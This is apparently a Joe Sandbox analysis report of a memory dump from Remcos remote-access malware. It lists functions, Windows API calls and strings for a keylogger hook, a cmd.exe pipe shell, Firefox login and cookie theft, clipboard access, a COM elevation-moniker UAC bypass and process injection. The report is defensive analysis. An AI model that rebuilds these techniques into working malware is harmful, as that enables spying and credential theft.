Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Strings

XPG, xrefs: 004082E7
Failed to download file: , xrefs: 004080A5
Unable to rename file!, xrefs: 00408413
Deleted file: , xrefs: 00407DC8
Browsing directory: , xrefs: 00408238
Executing file: , xrefs: 004081AD
XPG, xrefs: 00408430
XPG, xrefs: 00408718
Unable to delete: , xrefs: 00407E07
open, xrefs: 00408191
XPG, xrefs: 00407DED
(PG, xrefs: 004081F2
NG, xrefs: 00407CE5
Downloading file: , xrefs: 00407F7D
Downloaded file: , xrefs: 0040802E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 00405A2D
SystemDrive, xrefs: 00405761
0lG, xrefs: 00405988
0lG, xrefs: 004056D0
kG, xrefs: 004057DB
cmd.exe, xrefs: 0040574D
0lG, xrefs: 0040585A
0lG, xrefs: 00405954

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

Remcos restarted by watchdog!, xrefs: 00412160
\system32\, xrefs: 00412209
rmclient.exe, xrefs: 004122EA
WDH, xrefs: 004121B5, 004121BB, 00412420
\SysWOW64\, xrefs: 00412261
Watchdog module activated, xrefs: 00412184, 004123DC
svchost.exe, xrefs: 004122C5
fsutil.exe, xrefs: 0041230F
WinDir, xrefs: 0041221B, 00412270
Watchdog launch failed!, xrefs: 00412383

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

\logins.json, xrefs: 0040BC34
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
[Firefox StoredLogins not found], xrefs: 0040BBD4
\key3.db, xrefs: 0040BC76
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
UserProfile, xrefs: 0040BB60

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Uniqueness

Uniqueness Score: -1.00%

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32(00000000), ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32(0000000D,00000000), ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
[Firefox cookies found, cleared!], xrefs: 0040BEDF
\cookies.sqlite, xrefs: 0040BE2C
[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
UserProfile, xrefs: 0040BD60

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E

Strings

Inj, xrefs: 0040F769
ielowutil.exe, xrefs: 0040F716
ieinstal.exe, xrefs: 0040F6D5
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

5, xrefs: 00419809
1, xrefs: 00419695
2, xrefs: 004196F4
7, xrefs: 0041982A
3, xrefs: 00419754
VG, xrefs: 0041968B
4, xrefs: 004197B8
0, xrefs: 00419651
6, xrefs: 00419813

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

[+] CoGetObject, xrefs: 00407561
[+] CoGetObject SUCCESS, xrefs: 00407595
$, xrefs: 0040753B
Elevation:Administrator!new:, xrefs: 00407542
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] ucmAllocateElevatedObject, xrefs: 00407508
[-] CoGetObject FAILURE, xrefs: 0040758E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 004526E7, 00452745, 004526F2
lJD, xrefs: 00452626, 004527C5

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

AppData, xrefs: 0040C358
\cookies.sqlite, xrefs: 0040C409
\Mozilla\Firefox\Profiles\, xrefs: 0040C36E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Uniqueness

Uniqueness Score: -1.00%

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Strings

PG, xrefs: 00419BD5
PXG, xrefs: 00419E2E
PXG, xrefs: 00419CC8
8SG, xrefs: 00419BEB
NG, xrefs: 00419B25

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32(?), ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32(00000000), ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Uniqueness

Uniqueness Score: -1.00%

